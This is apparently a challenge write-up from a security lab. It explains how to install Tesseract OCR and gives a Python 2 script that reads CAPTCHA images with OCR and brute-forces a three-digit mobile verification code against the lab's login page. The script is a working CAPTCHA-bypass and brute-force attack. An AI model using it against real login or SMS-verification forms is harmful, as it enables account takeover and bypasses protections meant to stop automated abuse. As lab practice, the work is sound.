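Today I was helping 凉茶大哥 with a challenge that turned out to involve CAPTCHA recognition, so I looked into it.
First:
pip install pytesseract
The script still failed when I ran it, because pytesseract is only a wrapper around the tesseract executable. So the next step was installing Tesseract-OCR itself.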
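A quick way to confirm that this is the cause of the error is to check whether the tesseract executable is visible on PATH. The snippet below is only a sketch: the helper names `find_tesseract` and `describe_tesseract` are made up for illustration, and it is written for Python 3 (unlike the Python 2 script later in this post).

```python
import shutil


def find_tesseract(binary_name="tesseract"):
    """Return the full path of the executable, or None if it is not on PATH."""
    return shutil.which(binary_name)


def describe_tesseract(binary_name="tesseract"):
    """Build a one-line, human-readable status message (hypothetical helper)."""
    path = find_tesseract(binary_name)
    if path is None:
        return "%s not found on PATH; install Tesseract-OCR first" % binary_name
    return "%s found at %s" % (binary_name, path)


if __name__ == "__main__":
    print(describe_tesseract())
```

If this reports that the executable is missing, installing pytesseract alone will not be enough.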
Preparation:
Build environment: gcc, gcc-c++, make (most machines already have these, so this step can usually be skipped)
yum install gcc gcc-c++ make
Required packages: autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel leptonica (1.67 or later)
1. autoconf automake libtool libjpeg-devel libpng-devel libtiff-devel zlib-devel can be installed with yum:
yum install autoconf automake libtool
yum install libjpeg-devel libpng-devel libtiff-devel zlib-devel
2. leptonica has to be built and installed from source
References:
http://paramountideas.com/tesseract-ocr-30-and-leptonica-installation-centos-55-and-opensuse-113
http://www.leptonica.org/source/README.html
Download the leptonica package: http://www.leptonica.org/source/leptonica-1.68.tar.gz
Extract it and change into the leptonica-1.68 root directory:
./configure
make
make install
Installing tesseract:
Once the dependencies are in place, install tesseract.
Download the tesseract-3.01 package: http://tesseract-ocr.googlecode.com/files/tesseract-3.01.tar.gz
Extract it and change into the tesseract-3.01 root directory.
(If make fails with an error like strngs.h:1: error: stray ‘\357’ in program, re-save tesseract-3.01/ccutil/strngs.h in ANSI encoding and compile again.)
./autogen.sh
./configure
make
make install
ldconfig
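About the stray ‘\357’ error mentioned above: octal 357 is the byte 0xEF, which is the first byte of a UTF-8 byte order mark, so the most likely cause is a BOM at the start of strngs.h. As an alternative to re-saving the file in an editor, the BOM can be stripped directly. This is a sketch under that assumption, not the fix the original instructions describe; `strip_utf8_bom` is a hypothetical helper and the code is Python 3.

```python
import codecs


def strip_utf8_bom(path):
    """Remove a leading UTF-8 BOM from the file at `path`.

    Returns True if a BOM was found and removed, False if the file
    was left untouched.
    """
    with open(path, "rb") as f:
        data = f.read()
    if not data.startswith(codecs.BOM_UTF8):
        return False
    # Rewrite the file without the three BOM bytes (EF BB BF).
    with open(path, "wb") as f:
        f.write(data[len(codecs.BOM_UTF8):])
    return True
```

Usage would be something like `strip_utf8_bom("tesseract-3.01/ccutil/strngs.h")` before running make again.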
Installing the tesseract English language pack:
Download the tesseract-3.01 English language pack: http://tesseract-ocr.googlecode.com/files/tesseract-ocr-3.01.eng.tar.gz
Extract it and copy every file under tesseract-ocr/tessdata into /usr/local/share/tessdata
Installation complete.
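The copy step for the language data can also be scripted. The following is a minimal Python 3 sketch; `copy_tessdata` is a name invented here, and it only copies regular files at the top level of the source directory (subdirectories are skipped, which is an assumption about what "every file" should mean).

```python
import os
import shutil


def copy_tessdata(src_dir, dest_dir):
    """Copy every regular file in src_dir into dest_dir.

    Returns the sorted list of file names that were copied.
    """
    os.makedirs(dest_dir, exist_ok=True)
    copied = []
    for name in sorted(os.listdir(src_dir)):
        src = os.path.join(src_dir, name)
        if os.path.isfile(src):  # skip subdirectories
            shutil.copy2(src, os.path.join(dest_dir, name))
            copied.append(name)
    return copied
```

For the paths in this post the call would be `copy_tessdata("tesseract-ocr/tessdata", "/usr/local/share/tessdata")`, which will normally need root privileges.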
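A quick test:
Change into the extracted tesseract-3.01 root directory (it ships with a phototest.tif that can be used for testing).
Command line:
tesseract phototest.tif phototest -l eng
Output:
Tesseract Open Source OCR Engine v3.01 with Leptonica
Page 0
A phototest.txt file should now exist in the current directory, containing the text shown in phototest.tif.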
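The same test can be driven from Python, which is roughly what pytesseract does behind the scenes. This is a Python 3 sketch with invented helper names (`build_tesseract_command`, `run_tesseract`); it assumes tesseract is on PATH and that the generated text file is UTF-8.

```python
import subprocess


def build_tesseract_command(image_path, output_base, lang="eng"):
    """Return the argument list for: tesseract <image> <output_base> -l <lang>."""
    return ["tesseract", image_path, output_base, "-l", lang]


def run_tesseract(image_path, output_base, lang="eng"):
    """Run tesseract and return the text it wrote to <output_base>.txt.

    Raises subprocess.CalledProcessError if tesseract exits with an error.
    """
    subprocess.check_call(build_tesseract_command(image_path, output_base, lang))
    with open(output_base + ".txt", "r", encoding="utf-8") as f:
        return f.read()
```

Calling `run_tesseract("phototest.tif", "phototest")` from the tesseract-3.01 directory should return the same text as the command-line test.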
With everything installed, it was time to run the script:
#!/usr/bin/env python
# -*- coding: utf_8 -*-
# Date: 2016/6/10
# Note: this is Python 2 code (print statements, xrange, unicode).
try:
    import pytesseract
    from PIL import Image
    import requests
except ImportError:
    print 'module import error, please use pip install; pytesseract depends on the following'
    print 'http://www.lfd.uci.edu/~gohlke/pythonlibs/#pil'
    print 'http://code.google.com/p/tesseract-ocr/'
    raise SystemExit

# Session cookie; the CAPTCHA is bound to this session.
header = {'Cookie': 'PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXx'}

def vcode():
    """Download the CAPTCHA image and return the recognized text."""
    print 'python vcode recognize'
    pic_url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
    r = requests.get(pic_url, headers=header, timeout=10)
    with open('vcode.png', 'wb') as pic:
        pic.write(r.content)
    image = Image.open('vcode.png')
    im = pytesseract.image_to_string(image)
    print im
    print 'test3'
    im = im.replace(' ', '')
    if im != '':
        return im
    else:
        # Nothing recognized: fetch a fresh CAPTCHA and try again.
        return vcode()

try:
    print '\nScript number 11\n'
    # Brute-force the three-digit mobile code; 1000 so that 999 is also tried.
    for pwd in xrange(100, 1000):
        code = vcode()
        url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
        payload = {'username': 13388886666, 'mobi_code': pwd, 'user_code': code}
        r = requests.post(url, data=payload, headers=header, timeout=10)
        response = unicode(r.content, 'utf-8').encode('gbk')
        if 'error' not in response:
            print 'Correct vcode is:', pwd, response
            break
        else:
            print 'Trying vcode:', pwd, code
except KeyboardInterrupt:
    raise SystemExit('Already Exit!')
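One thing worth noting about vcode() is that it calls itself whenever the OCR result is empty, so a long run of unreadable CAPTCHAs could in principle hit Python's recursion limit. A bounded loop avoids that. The sketch below is Python 3 and is not part of the original script: `clean_code`, `recognize_with_retry`, and the `read_captcha` callback are hypothetical names, and it strips all whitespace rather than only spaces.

```python
def clean_code(text):
    """Drop all whitespace (spaces, tabs, newlines) from an OCR result."""
    return "".join(text.split())


def recognize_with_retry(read_captcha, max_attempts=5):
    """Call read_captcha() until it yields non-empty text.

    read_captcha is any zero-argument function that downloads a CAPTCHA
    and returns the raw OCR string. Raises RuntimeError after
    max_attempts empty results.
    """
    for _ in range(max_attempts):
        code = clean_code(read_captcha())
        if code:
            return code
    raise RuntimeError("no text recognized after %d attempts" % max_attempts)
```

In the script above, the download-and-OCR part of vcode() would play the role of `read_captcha`.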
Run it and wait for the result.
Problem solved. Time to ask 凉茶大哥 for a red envelope...